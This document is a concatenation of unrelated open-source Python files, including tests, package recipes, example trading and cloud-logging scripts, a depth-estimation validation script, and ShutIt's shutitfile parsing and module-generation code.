m = match_standard_transaction_exactly_and_return_pubkey(b"\xba" + STANDARD_TRANSACTION_1 + b"\xfa")
assert m is None
m = match_standard_transaction_exactly_and_return_pubkey(b"\xba" + STANDARD_TRANSACTION_1)
assert m is None
m = match_standard_transaction_exactly_and_return_pubkey(
gen1[EXPECTED_START : EXPECTED_END + PUBKEY_PLUS_SUFFIX]
)
assert m == hexstr_to_bytes(
"b081963921826355dcb6c355ccf9c2637c18adf7d38ee44d803ea9ca41587e48c913d8d46896eb830aeadfc13144a8eac3"
)
m = match_standard_transaction_exactly_and_return_pubkey(gen1)
assert m is None
|
cx_Freeze/samples/find_spec/dummypackage/dummymodule.py | lexa/cx_Freeze | 358 | 12609822 | print("Hi, I'm a module!")
raise Exception(
"This module-level exception should also not occur during freeze"
)
|
var/spack/repos/builtin/packages/bat/package.py | kkauder/spack | 2,360 | 12609834 | <filename>var/spack/repos/builtin/packages/bat/package.py<gh_stars>1000+
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Bat(Package):
"""A cat(1) clone with wings."""
homepage = 'https://github.com/sharkdp/bat'
url = 'https://github.com/sharkdp/bat/archive/v0.13.0.tar.gz'
version('0.13.0', sha256='f4aee370013e2a3bc84c405738ed0ab6e334d3a9f22c18031a7ea008cd5abd2a')
version('0.12.1', sha256='1dd184ddc9e5228ba94d19afc0b8b440bfc1819fef8133fe331e2c0ec9e3f8e2')
depends_on('rust')
def install(self, spec, prefix):
cargo = which('cargo')
cargo('install', '--root', prefix, '--path', '.')
|
tools/style_variable_generator/find_invalid_css_variables_test.py | mghgroup/Glide-Browser | 575 | 12609845 | # Copyright 2020 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from find_invalid_css_variables import FindInvalidCSSVariables
import unittest
class FindInvalidCSSVariablesTest(unittest.TestCase):
def testUnspecified(self):
def GitResult(command):
return '''--test-not-specified
--test-only-rgb-used-rgb
--test-toolbar'''
json_string = '''
{
options: {
CSS: {
prefix: 'test'
}
},
colors: {
toolbar: "rgb(255, 255, 255)",
only_rgb_used: "rgb(255, 255, 255)",
}
}
'''
result = FindInvalidCSSVariables(json_string,
'test',
git_runner=GitResult)
unused = set()
self.assertEqual(result['unused'], unused)
unspecified = set(['--test-not-specified'])
self.assertEqual(result['unspecified'], unspecified)
def testUnused(self):
def GitResult(command):
return '''--test-toolbar'''
json_string = '''
{
options: {
CSS: {
prefix: 'test'
}
},
colors: {
toolbar: "rgb(255, 255, 255)",
unused: "rgb(255, 255, 255)",
}
}
'''
result = FindInvalidCSSVariables(json_string,
'test',
git_runner=GitResult)
unused = set(['--test-unused'])
self.assertEqual(result['unused'], unused)
unspecified = set()
self.assertEqual(result['unspecified'], unspecified)
def testNoPrefix(self):
def GitResult(command):
return ''
json_string = '''
{
colors: {
toolbar: "rgb(255, 255, 255)",
}
}
'''
self.assertRaises(KeyError,
FindInvalidCSSVariables,
json_string,
'test',
git_runner=GitResult)
if __name__ == '__main__':
unittest.main()
|
examples/spot/wallet/trade_fee.py | Banging12/binance-connector-python | 512 | 12609847 | <reponame>Banging12/binance-connector-python<filename>examples/spot/wallet/trade_fee.py
#!/usr/bin/env python
import logging
from binance.spot import Spot as Client
from binance.lib.utils import config_logging
config_logging(logging, logging.DEBUG)
key = ""
secret = ""
spot_client = Client(key, secret)
logging.info(spot_client.trade_fee())
|
examples/gm_realtime.py | xf1688/czsc | 206 | 12609848 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
"""
author: zengbin93
email: <EMAIL>
create_dt: 2021/12/13 17:48
describe: A股股票实盘仿真
环境变量设置说明:
strategy_id 掘金研究策略ID
account_id 账户ID
wx_key 企业微信群聊机器人Key
max_sym_pos 单仓位限制
path_gm_logs gm_logs的路径,默认值:C:/gm_logs
环境变量设置样例:
# 使用 os 模块设置
os.environ['strategy_id'] = 'c7991760-****-11eb-b66a-00163e0c87d1'
os.environ['account_id'] = '<KEY>'
os.environ['wx_key'] = '<KEY>'
os.environ['max_sym_pos'] = '0.5'
os.environ['path_gm_logs'] = 'C:/gm_logs'
"""
from czsc.gm_utils import *
from czsc.strategies import trader_strategy_a as strategy
def init(context):
symbols = [
'SZSE.300014',
'SHSE.600143',
'SZSE.002216',
'SZSE.300033',
'SZSE.000795',
'SZSE.002739',
'SHSE.600000',
'SHSE.600008',
'SHSE.600006',
'SHSE.600009',
'SHSE.600010',
'SHSE.600011'
]
name = f"{strategy.__name__}"
init_context_universal(context, name)
init_context_env(context)
init_context_traders(context, symbols, strategy)
init_context_schedule(context)
if __name__ == '__main__':
run(filename=os.path.basename(__file__), token=gm_token, mode=MODE_LIVE, strategy_id=os.environ['strategy_id'])
|
mayan/apps/authentication/__init__.py | eshbeata/open-paperless | 2,743 | 12609857 | from __future__ import unicode_literals
default_app_config = 'authentication.apps.AuthenticationApp'
|
03_regression/src/spark_kaggle_starter/logging_lib/MarkdownBuilder.py | austinfrazer/GWU_data_mining | 229 | 12609863 | import logging
import os
import io
from datetime import datetime
import boto3
from boto3.s3.transfer import S3Transfer
import botocore
import platform
class MarkdownBuilder(object):
"""
A class for logging code output and mathplotlib plots in aws s3. Only ONE
object should be instantiated for a script for consolidated results.
"""
def __init__(self, profile_name = 'default', s3_bucket = 'emr-related-files',s3_bucket_path='job_logs/',app_name='MyApp',path_to_save_logs_local=os.path.dirname(__file__)+'/logs'):
self.s3_bucket = s3_bucket # S3 Bucket to use for storage
self.profile_name = profile_name # Define IAM profile name (see: http://boto3.readthedocs.io/en/latest/guide/configuration.html)(config file located at user folder .aws directory)
self.s3_bucket_path = s3_bucket_path #The path to store the logs on your bucket (must end in a / b/c its a directory)
self.app_name = app_name #The name of your app
self.path_to_save_logs_local = path_to_save_logs_local #A path to save all the built logs on your local machine.
def get_datetime_str(self):
"""
Gets a formated datetime string for naming purposes.
"""
return datetime.now().strftime("%Y%m%d.%H:%M:%S.%f")
def log_string(self,string):
s3 = boto3.resource('s3')
bucket = s3.Bucket(self.s3_bucket)
path = self.get_path_for_new_log()
bucket.put_object(Body=string, ContentType='text/plain', Key=path)
def build_markdowns(self):
s3 = boto3.resource('s3')
bucket = s3.Bucket(self.s3_bucket)
result = bucket.meta.client.list_objects_v2(Bucket=bucket.name,
Delimiter='/', Prefix=self.s3_bucket_path+'unbuilt/')
for o in result.get('CommonPrefixes'):
prefix = o.get('Prefix') #example: job_logs/unbuilt/MyApp&&&20170607.00:54:28.355680/
splits = prefix.split('/')
folder_name = splits[-2]
splits2 = folder_name.split('&&&')
app_name = splits2[0]
timestamp = splits2[1]
result_inner = bucket.meta.client.list_objects_v2(Bucket=bucket.name,
Prefix=prefix)
objects_to_delete = []
#Start making the first unbuilt markdown file
markdown_str = 'Logs for ' + app_name + ' executed on ' +timestamp + ':\n'
built_file_directory = self.s3_bucket_path + 'built/' + app_name + '/'+timestamp
for o2 in result_inner.get('Contents'):
key = o2.get('Key')
key_split = key.split('/')
filename, file_extension = os.path.splitext(key_split[-1])
#Get ride of characters that are bad for windows files
filename = filename.replace(':','').replace('.','')
#This file will be deleted later
objects_to_delete.append({'Key':key})
#Download the file
obj = s3.Object(bucket, key)
if file_extension in ['.png','.jpg']:
#its a plot or image
if self.path_to_save_logs_local != False:
file_path = self.path_to_save_logs_local+'/'+app_name+'/'+timestamp.replace(':','').replace('.','')+'/data/'
if platform.system() == 'Windows':
file_path = file_path.replace('/','\\').replace(':','.')
#Make the directory if it doesnt exist
if not os.path.exists(file_path):
os.makedirs(file_path)
transfer = S3Transfer(boto3.client('s3'))
#download the file to a local location
transfer.download_file(self.s3_bucket,key,file_path+filename+file_extension)
markdown_str += ''.format(image_name=filename,relative_path='data/'+filename+file_extension) + '\n'
else:
file_content = boto3.client('s3').get_object(Bucket=self.s3_bucket,Key=key)['Body'].read().decode('UTF-8')
print(file_content)
markdown_str += "<p style='white-space: nowrap;'>`"+str(file_content)+'`</p>'+'\n'
s3.Object(self.s3_bucket,built_file_directory+'/data/'+filename+file_extension).copy_from(CopySource=self.s3_bucket+'/'+key)
bucket.put_object(Body=markdown_str, ContentType='text/plain', Key=built_file_directory+'/log.md')
if self.path_to_save_logs_local != False:
file_path = self.path_to_save_logs_local+'/'+app_name+'/'+timestamp.replace(':','').replace('.','')
if platform.system() == 'Windows':
file_path = file_path.replace('/','\\').replace(':','.')
#Make the directory if it doesnt exist
if not os.path.exists(file_path):
os.makedirs(file_path)
file = open(file_path+'/log.md','w')
file.write(markdown_str)
file.close()
#delete the old files now that they have been moved to built
bucket.delete_objects(Delete={'Objects':objects_to_delete})
|
depth/val_dlsm.py | zhaoxiaodong95/lsm | 255 | 12609893 | <reponame>zhaoxiaodong95/lsm
import argparse
import logging
import os.path as osp
import time
import numpy as np
import tensorflow as tf
from tqdm import tqdm
from config import SHAPENET_IM
from evaluate import eval_l1_err, print_depth_stats
from loader import pad_batch
from models import grid_nets, im_nets, model_dlsm
from mvnet import MVNet
from ops import conv_rnns
from shapenet import ShapeNet
from tensorboard_logging import TensorboardLogger
from utils import get_session_config, init_logging, mkdir_p, process_args
def tensorboard_log(stats, tbd, step):
tbd.log_scalar('masked_l1_err', np.mean(stats), step)
def validate(args, checkpoint):
net = MVNet(
vmin=-0.5,
vmax=0.5,
vox_bs=args.val_batch_size,
im_bs=args.val_im_batch,
grid_size=args.nvox,
im_h=args.im_h,
im_w=args.im_w,
mode="TEST",
norm=args.norm)
im_dir = SHAPENET_IM
# Setup network
net = model_dlsm(
net,
im_nets[args.im_net],
grid_nets[args.grid_net],
conv_rnns[args.rnn],
im_skip=args.im_skip,
ray_samples=args.ray_samples,
sepup=args.sepup,
proj_x=args.proj_x,
proj_last=True)
sess = tf.Session(config=get_session_config())
saver = tf.train.Saver()
saver.restore(sess, checkpoint)
coord = tf.train.Coordinator()
# Init dataset
dset = ShapeNet(im_dir=im_dir, split_file=args.val_split_file, rng_seed=1)
mids = dset.get_smids('val')
logging.info('Validating %d models', len(mids))
items = ['shape_id', 'model_id', 'im', 'K', 'R', 'depth']
dset.init_queue(
mids,
args.val_im_batch,
items,
coord,
nepochs=1,
qsize=32,
nthreads=args.prefetch_threads)
# Init stats
l1_err = []
# Testing loop
pbar = tqdm(desc='Validating', total=len(mids))
deq_mids, deq_sids = [], []
try:
while not coord.should_stop():
batch_data = dset.next_batch(items, net.batch_size)
if batch_data is None:
continue
deq_sids.append(batch_data['shape_id'])
deq_mids.append(batch_data['model_id'])
num_batch_items = batch_data['K'].shape[0]
batch_data = pad_batch(batch_data, args.val_batch_size)
feed_dict = {
net.K: batch_data['K'],
net.Rcam: batch_data['R'],
net.ims: batch_data['im']
}
pred = sess.run(net.depth_out, feed_dict=feed_dict)
batch_err = eval_l1_err(pred[:num_batch_items],
batch_data['depth'][:num_batch_items])
l1_err.extend(batch_err)
pbar.update(num_batch_items)
except Exception, e:
logger.error(repr(e))
dset.close_queue(e)
finally:
pbar.close()
sess.close()
logger.info('Validation completed')
coord.join()
deq_mids = np.concatenate(deq_mids, axis=0)[..., 0].tolist()
deq_sids = np.concatenate(deq_sids, axis=0)[..., 0].tolist()
# Print statistics and save to file
stats, stats_table = print_depth_stats(zip(deq_sids, deq_mids), l1_err)
return stats, stats_table
def parse_args():
parser = argparse.ArgumentParser(description='Options for MVNet')
parser.add_argument('--log', type=str, default=None)
parser.add_argument('--val_batch_size', type=int, default=4)
parser.add_argument('--val_im_batch', type=int, default=4)
parser.add_argument('--loglevel', type=str, default='info')
parser.add_argument(
'--val_split_file', type=str, default='data/splits.json')
parser.add_argument('--prefetch_threads', type=int, default=2)
parser.add_argument('--sleep_time', type=int, default=15)
args = process_args(parser)
return args
if __name__ == '__main__':
args = parse_args()
init_logging(args.loglevel)
logger = logging.getLogger('mview3d.' + __name__)
logger.info('Starting validation @ %s', args.log)
# Initialize tensorboard logger
mkdir_p(osp.join(args.log, 'val'))
tbd_logger = TensorboardLogger(log_dir=osp.join(args.log, 'val'))
processed = []
while True:
tf.reset_default_graph()
latest_checkpoint = tf.train.latest_checkpoint(args.log)
if latest_checkpoint is None or latest_checkpoint in processed:
time.sleep(args.sleep_time * 60)
logger.info('Checking for new checkpoints')
continue
step = int(osp.basename(latest_checkpoint).split('-')[-1])
logger.info('Validate %s', latest_checkpoint)
val_stats, table = validate(args, latest_checkpoint)
tensorboard_log(val_stats, tbd_logger, step)
processed.append(latest_checkpoint)
logging.info(table)
if step >= args.niters:
logging.info('Finished training/validation for %d iterations',
args.niters)
break
|
shutit_patterns/shutitfile.py | controlplaneio/shutit | 2,063 | 12609896 | <gh_stars>1000+
#!/usr/bin/env pythen
# The MIT License (MIT)
#
# Copyright (C) 2014 OpenBet Limited
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is furnished to do
# so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# ITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import print_function
import logging
import os
import random
import re
import shutil
import sys
try:
from urllib.parse import urlparse
from urllib.request import urlopen
except ImportError:
from urlparse import urlparse
from urllib2 import urlopen
from six import iteritems
import shutit_global
import shutit_skeleton
def setup_shutitfile_pattern(shutit,
skel_path,
skel_delivery,
skel_pattern,
skel_domain,
skel_module_name,
skel_vagrant_num_machines,
skel_vagrant_machine_prefix,
skel_vagrant_ssh_access,
skel_vagrant_docker):
shutit_skeleton_extra_args = ''
if skel_pattern == 'shutitfile' and skel_delivery == 'vagrant':
# This is a vagrant build, adjust accordingly.
skel_pattern = 'vagrant'
skel_delivery = 'bash'
if skel_vagrant_num_machines is not None:
shutit_skeleton_extra_args += ' --vagrant_num_machines ' + skel_vagrant_num_machines
else:
shutit_skeleton_extra_args += ' --vagrant_num_machines 3'
if skel_vagrant_machine_prefix is not None:
shutit_skeleton_extra_args += ' --vagrant_machine_prefix ' + skel_vagrant_machine_prefix
else:
shutit_skeleton_extra_args += ' --vagrant_machine_prefix machine'
if skel_vagrant_ssh_access is True:
shutit_skeleton_extra_args += ' --vagrant_ssh_access'
if skel_vagrant_docker is True:
shutit_skeleton_extra_args += ' --vagrant_docker'
if skel_pattern == 'shutitfile' and skel_delivery == 'docker':
# This is a docker build, adjust accordingly.
skel_pattern = 'docker'
skel_delivery = 'docker'
runsh_filename = skel_path + '/run.sh'
runsh_file = open(runsh_filename,'w+')
runsh_file.write('''#!/bin/bash
set -e
MODULE_NAME="''' + skel_module_name + '''"
DIR="/tmp/shutit_built''' + skel_path + '''"
DOMAIN="''' + skel_domain + '''"
DELIVERY="''' + skel_delivery + '''"
PATTERN="''' + skel_pattern + '''"
rm -rf $DIR
shutit skeleton --shutitfile ShutItFile1.sf ShutItFile2.sf --name ${DIR} --domain ${DOMAIN} --delivery ${DELIVERY} --pattern ${PATTERN}''' + shutit_skeleton_extra_args + '''
if [[ ${DELIVERY} == 'bash' ]]
then
cd $DIR && ./run.sh "$@"
elif [[ ${DELIVERY} == 'docker' ]]
then
cd $DIR && ./build.sh "$@"
fi''')
runsh_file.close()
os.chmod(runsh_filename,0o755)
# User message
shutit.log('''# Run:
cd ''' + skel_path + ''' && ./run.sh
# to run.
# Or
# cd ''' + skel_path + ''' && ./run.sh -c
# to run while choosing modules to build. ''',transient=True)
# ShutItFile1
shutitfile1_filename = skel_path + '/ShutItFile1.sf'
shutitfile1_file = open(shutitfile1_filename,'w+')
shutitfile1_contents = '''# See [here](https://github.com/ianmiell/shutitfile/blob/master/CheatSheet.md) for a cheat sheet.
# See [here](https://github.com/ianmiell/shutitfile/examples) for examples.'''
shutitfile1_file.write(shutitfile1_contents)
shutitfile1_file.close()
# ShutItFile2.sf
shutitfile2_filename = skel_path + '/ShutItFile2.sf'
shutitfile2_file = open(shutitfile2_filename,'w+')
shutitfile2_contents = '''# See [here](https://github.com/ianmiell/shutitfile/blob/master/CheatSheet.md) for a cheat sheet.
# See [here](https://github.com/ianmiell/shutitfile/examples) for examples.'''
shutitfile2_file.write(shutitfile2_contents)
shutitfile2_file.close()
# Parses the shutitfile (passed in as a string)
# and info to extract, and returns a list with the information in a more canonical form, still ordered.
def parse_shutitfile(contents):
ret = []
full_line = ''
for line in contents.split('\n'):
line = line.strip()
# Handle continuations
if line:
if line[-1] == '\\':
full_line += line[0:-1]
continue
else:
full_line += line
if re.match(r"^IF_NOT+[\s]+([A-Z_]+)[\s]+(.*)$", full_line):
m = re.match(r"^IF_NOT+[\s]+([A-Z_]+)[\s]+(.*)$", full_line)
ret.append(['IF_NOT',m.group(1),m.group(2)])
elif re.match(r"^STORE_RUN+[\s]+([a-zA-Z0-9_]+)[\s]+(.*)$", full_line):
m = re.match(r"^STORE_RUN+[\s]+([a-zA-Z0-9_]+)[\s]+(.*)$", full_line)
ret.append(['STORE_RUN',m.group(1),m.group(2)])
elif re.match(r"^ELIF_NOT[\s]+([A-Z_]+)[\s]+(.*)$", full_line):
m = re.match(r"^ELIF_NOT[\s]+([A-Z_]+)[\s]+(.*)$", full_line)
ret.append(['ELIF_NOT',m.group(1),m.group(2)])
elif re.match(r"^IF[\s]+([A-Z_]+)[\s]+(.*)$", full_line):
m = re.match(r"^IF[\s]+([A-Z_]+)[\s]+(.*)$", full_line)
ret.append(['IF',m.group(1),m.group(2)])
elif re.match(r"^ELIF[\s]+([A-Z_]+)[\s]+(.*)$", full_line):
m = re.match(r"^ELIF[\s]+([A-Z_]+)[\s]+(.*)$", full_line)
ret.append(['ELIF',m.group(1),m.group(2)])
elif re.match("^ELSE$", full_line):
ret.append(['ELSE'])
elif re.match("^ENDIF$", full_line):
ret.append(['ENDIF'])
elif re.match(r"^([A-Za-z_]+)[\s]*(.*)$", full_line):
m = re.match(r"^[\s]*([A-Za-z_]+)[\s]*(.*)$", full_line)
ret.append([m.group(1), m.group(2)])
elif re.match("^#(.*)$", full_line):
# Comments should be added with 'COMMENT a comment'
pass
else:
full_line_split = ''.join((full_line[:10000].split()))
full_line_strings = re.findall("[^\x00-\x1F\x7F-\xFF]", full_line_split)
shutit_global.shutit_global_object.shutit_print('FAILED TO PARSE: ' + full_line_strings[:30] + '[...]')
return [], False
full_line = ''
return ret, True
def parse_shutitfile_args(args_str):
"""Parse shutitfile args (eg in the line 'RUN some args', the passed-in args_str would be 'some args').
If the string is bounded by square brackets, then it's treated in the form: ['arg1','arg2'], and the returned list looks the same.
If the string composed entirely of name-value pairs (eg RUN a=b c=d) then it's returned as a dict (eg {'a':'b','c':'d'}).
If what's passed-in is of the form: "COMMAND ['a=b','c=d']" then a dict is also returned.'
Also eg: ["asd and space=value","asd 2=asdgasdg"]"""
ret = []
if args_str == '':
return ret
if args_str[0] == '[' and args_str[-1] == ']':
ret = eval(args_str)
assert isinstance(ret, list)
else:
ret = args_str.split()
# if all the items have a = in them, then return a dict of nv pairs
nv_pairs = True
for item in ret:
if item.find('=') < 0:
nv_pairs = False
if nv_pairs:
d = {}
for item in ret:
item_nv = item.split('=')
d.update({item_nv[0]:item_nv[1]})
ret = d
return ret
# Takes a shutitfile filename and returns represention of that Dockerfile as a ShutIt module snippets
def shutitfile_to_shutit_module(shutit,
skel_shutitfile,
skel_path,
skel_domain,
skel_module_name,
skel_domain_hash,
skel_delivery,
skel_depends,
order,
total,
skel_module_modifier):
if not os.path.exists(skel_shutitfile):
if urlparse(skel_shutitfile)[0] == '':
shutit.fail('Dockerfile/ShutItFile "' + skel_shutitfile + '" must exist')
shutitfile_contents = urlopen(skel_shutitfile).read()
shutitfile_dirname = None
else:
shutitfile_contents = open(skel_shutitfile).read()
shutitfile_dirname = os.path.dirname(skel_shutitfile)
if shutitfile_dirname == '':
shutitfile_dirname = './'
if os.path.exists(shutitfile_dirname):
if os.path.exists(skel_path + '/context'):
shutil.rmtree(skel_path + '/context')
shutil.copytree(shutitfile_dirname, skel_path + '/context')
else:
# Copy any other files that do not already exist on the target
os.system('cp -r -n ' + shutitfile_dirname + '/* ' + skel_path)
# Change to this context
os.chdir(shutitfile_dirname)
# Process the shutitfile
shutitfile_representation, ok = shutit_skeleton.process_shutitfile(shutit, shutitfile_contents)
if not ok:
return '', '', '', '', '', False
# Check the shutitfile representation
check_shutitfile_representation(shutit, shutitfile_representation, skel_delivery)
# Get the shutit module as a string
sections, module_id, _, depends, default_include = generate_shutit_module_sections(shutit, shutitfile_representation, skel_domain, skel_module_name, skel_module_modifier, skel_shutitfile, skel_depends, order, total)
if module_id == skel_module_name:
module_id = skel_domain + """.""" + skel_module_name + skel_module_modifier
# Final section
final_section = """
def module():
return """ + skel_module_name + skel_module_modifier + """(
'""" + module_id + """', """ + skel_domain_hash + str(order * 0.0001) + str(random.randint(1,999)) + """,
description='""" + shutitfile_representation['shutitfile']['description'] + """',
delivery_methods=[('""" + skel_delivery + """')],
maintainer='""" + shutitfile_representation['shutitfile']['maintainer'] + """',
depends=[""" + depends + """]
)
"""
sections.update({'final_section':final_section})
# Return program to main shutit_dir
if shutitfile_dirname:
os.chdir(sys.path[0])
return sections, module_id, skel_module_name, default_include, ok
def check_shutitfile_representation(shutit, shutitfile_representation, skel_delivery):
# delivery directives
# Only allow one type of delivery
shutitfile_delivery = set()
# If we've been given a delivery method, add that.
if skel_delivery:
shutitfile_delivery.add(skel_delivery)
for item in shutitfile_representation['shutitfile']['delivery']:
shutitfile_delivery.add(item[1])
if len(shutitfile_delivery) > 1:
shutit.fail('Conflicting delivery methods in ShutItFile')
elif len(shutitfile_delivery) == 1:
skel_delivery = shutitfile_delivery.pop()
else:
# Default skel_delivery to bash if none seen
skel_delivery = 'bash'
if skel_delivery not in shutit_global.shutit_global_object.allowed_delivery_methods:
shutit.fail('Disallowed delivery method in ShutItFile: ' + skel_delivery)
if skel_delivery != 'docker':
# FROM, ONBUILD, VOLUME, EXPOSE, ENTRYPOINT, CMD, COMMIT, PUSH are verboten
failed = False
if shutitfile_representation['shutitfile']['cmd'] != '' or shutitfile_representation['shutitfile']['volume'] != [] or shutitfile_representation['shutitfile']['onbuild'] != [] or shutitfile_representation['shutitfile']['expose'] != [] or shutitfile_representation['shutitfile']['entrypoint'] != []:
failed = True
for item in shutitfile_representation['shutitfile']['script']:
if item[0] in ('PUSH','COMMIT'):
failed = True
break
if failed:
shutit.fail('One of FROM, ONBUILD, VOLUME, EXPOSE, ENTRYPOINT or CMD, COMMIT, PUSH used in ShutItFile not using the Docker delivery method.')
def generate_shutit_module_sections(shutit,
shutitfile_representation,
skel_domain,
skel_module_name,
skel_module_modifier,
skel_shutitfile,
skel_depends,
order,
total):
sections = {}
sections.update({'header_section':'\n# Created from shutitfile: ' + skel_shutitfile + '\n# Maintainer: ' + shutitfile_representation['shutitfile']['maintainer'] + '\nfrom shutit_module import ShutItModule\n\nclass ' + skel_module_name + skel_module_modifier + '(ShutItModule):\n\n\tdef is_installed(self, shutit):\n\t\treturn False'})
# config section - this must be done first, as it collates the config
# items that can be referenced later
config_section = ''
if shutitfile_representation['shutitfile']['module_id']:
module_id = shutitfile_representation['shutitfile']['module_id']
else:
# If the total number of modules is more than 1, then we want to number these modules.
if total > 1:
module_id = '%s.%s.%s_%s' % (skel_domain, skel_module_name, skel_module_name, str(order))
else:
module_id = '%s.%s.%s' % (skel_domain, skel_module_name, skel_module_name)
build = ''
for item in shutitfile_representation['shutitfile']['config']:
build += handle_shutitfile_config_line(item)
if build:
config_section += '\n\t\t' + build
sections.update({'config_section':config_section})
# build
build = ''
numpushes = 0
numlogins = 0
ifdepth = 0
wgetgot = False
current_note = ''
# section is the section of the shutitfile we're in. Default is 'build', but there are also a few others.
section = 'build'
build_section = ''
for item in shutitfile_representation['shutitfile']['script']:
section = shutitfile_get_section(item[0], section)
if section == 'build':
ret = handle_shutitfile_script_line(shutit, item, numpushes, wgetgot, numlogins, ifdepth, current_note)
build += ret[0]
numpushes = ret[1]
wgetgot = ret[2]
numlogins = ret[3]
ifdepth = ret[4]
current_note = ret[5]
build_section += build
while numpushes > 0:
build_section += '''\n\t\tshutit.send('popd')'''
numpushes -= 1
while numlogins > 0:
build_section += '''\n\t\tshutit.logout()'''
numlogins -= 1
if ifdepth != 0:
shutit.fail('Unbalanced IFs in ' + section + ' section')
sections.update({'build_section':build_section})
# finalize section
finalize = ''
for line in shutitfile_representation['shutitfile']['onbuild']:
finalize += '\n\n\t\tshutit.send(\'' + line + ')\''
sections.update({'finalize_section':finalize})
# test section
build = ''
test_section = ''
numpushes = 0
numlogins = 0
ifdepth = 0
current_note = ''
for item in shutitfile_representation['shutitfile']['script']:
section = shutitfile_get_section(item[0], section)
if section == 'test':
ret = handle_shutitfile_script_line(shutit, item, numpushes, wgetgot, numlogins, ifdepth, current_note)
build += ret[0]
numpushes = ret[1]
wgetgot = ret[2]
numlogins = ret[3]
ifdepth = ret[4]
current_note = ret[5]
if build:
test_section += '\n\t\t' + build
while numpushes > 0:
test_section += """\n\t\tshutit.send('popd')"""
numpushes -= 1
while numlogins > 0:
test_section += '''\n\t\tshutit.logout()'''
numlogins -= 1
sections.update({'test_section':test_section})
# isinstalled section
build = ''
isinstalled_section = ''
numpushes = 0
numlogins = 0
ifdepth = 0
current_note = ''
for item in shutitfile_representation['shutitfile']['script']:
section = shutitfile_get_section(item[0], section)
if section == 'isinstalled':
ret = handle_shutitfile_script_line(shutit, item, numpushes, wgetgot, numlogins, ifdepth, current_note)
build += ret[0]
numpushes = ret[1]
wgetgot = ret[2]
numlogins = ret[3]
ifdepth = ret[4]
current_note = ret[5]
if build:
isinstalled_section += '\n\t\t' + build
while numpushes > 0:
isinstalled_section += """\n\t\tshutit.send('popd')"""
numpushes -= 1
while numlogins > 0:
isinstalled_section += '''\n\t\tshutit.logout()'''
numlogins -= 1
if ifdepth != 0:
shutit.fail('Unbalanced IFs in ' + section + ' section')
sections.update({'isinstalled_section':isinstalled_section})
# start section
build = ''
start_section = ''
numpushes = 0
numlogins = 0
ifdepth = 0
current_note = ''
for item in shutitfile_representation['shutitfile']['script']:
section = shutitfile_get_section(item[0], section)
if section == 'start':
ret = handle_shutitfile_script_line(shutit, item, numpushes, wgetgot, numlogins, ifdepth, current_note)
build += ret[0]
numpushes = ret[1]
wgetgot = ret[2]
numlogins = ret[3]
ifdepth = ret[4]
current_note = ret[5]
if build:
start_section += '\n\t\t' + build
while numpushes > 0:
start_section += """\n\t\tshutit.send('popd')"""
numpushes -= 1
while numlogins > 0:
start_section += '''\n\t\tshutit.logout()'''
numlogins -= 1
if ifdepth != 0:
shutit.fail('Unbalanced IFs in ' + section + ' section')
sections.update({'start_section':start_section})
# stop section
build = ''
stop_section = ''
numpushes = 0
numlogins = 0
ifdepth = 0
current_note = ''
for item in shutitfile_representation['shutitfile']['script']:
section = shutitfile_get_section(item[0], section)
if section == 'stop':
ret = handle_shutitfile_script_line(shutit, item, numpushes, wgetgot, numlogins, ifdepth, current_note)
build += ret[0]
numpushes = ret[1]
wgetgot = ret[2]
numlogins = ret[3]
ifdepth = ret[4]
current_note = ret[5]
if build:
stop_section += '\n\t\t' + build
while numpushes > 0:
stop_section += """\n\t\tshutit.send('popd')"""
numpushes -= 1
while numlogins > 0:
stop_section += '''\n\t\tshutit.logout()'''
numlogins -= 1
if ifdepth != 0:
shutit.fail('Unbalanced IFs in ' + section + ' section')
sections.update({'stop_section':stop_section})
# dependencies section
shutitfile_depends = []
for item in shutitfile_representation['shutitfile']['depends']:
shutitfile_depends.append(item[1])
if shutitfile_depends:
depends = "'" + skel_depends + "','" + "','".join(shutitfile_depends) + "'"
else:
depends = "'" + skel_depends + "'"
if shutitfile_representation['shutitfile']['default_include'] == 'false':
default_include = 'no'
elif shutitfile_representation['shutitfile']['default_include'] == 'true':
default_include = 'yes'
else:
shutit.fail('Unrecognised DEFAULT_INCLUDE - must be true/false: ' + shutitfile_representation['shutitfile']['default_include'])
if shutitfile_representation['shutitfile']['module_id']:
module_id = shutitfile_representation['shutitfile']['module_id']
else:
module_id = skel_module_name
return sections, module_id, module_id, depends, default_include
def handle_shutitfile_config_line(line):
shutitfile_command = line[0].upper()
build = ''
numtabs = 2
assert shutitfile_command in ('CONFIG','CONFIG_SECRET'), '%r is not a handled config command' % shutitfile_command
if shutitfile_command in ('CONFIG','CONFIG_SECRET'):
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, (dict,list))
if shutitfile_command == 'CONFIG':
secret_str = 'False'
elif shutitfile_command == 'CONFIG_SECRET':
secret_str = 'True'
if isinstance(shutitfile_args, list):
assert len(shutitfile_args) in (1,2), ''
cfg_name = shutitfile_args[0]
if len(shutitfile_args) == 1:
build += """\n""" + numtabs*'\t' + """shutit.get_config(self.module_id,'""" + cfg_name + """',secret=""" + secret_str + """)"""
elif len(shutitfile_args) == 2:
cfg_default = shutitfile_args[1]
build += """\n""" + numtabs*'\t' + """shutit.get_config(self.module_id,'""" + cfg_name + """',default='""" + cfg_default + """',secret=""" + secret_str + """)"""
return build
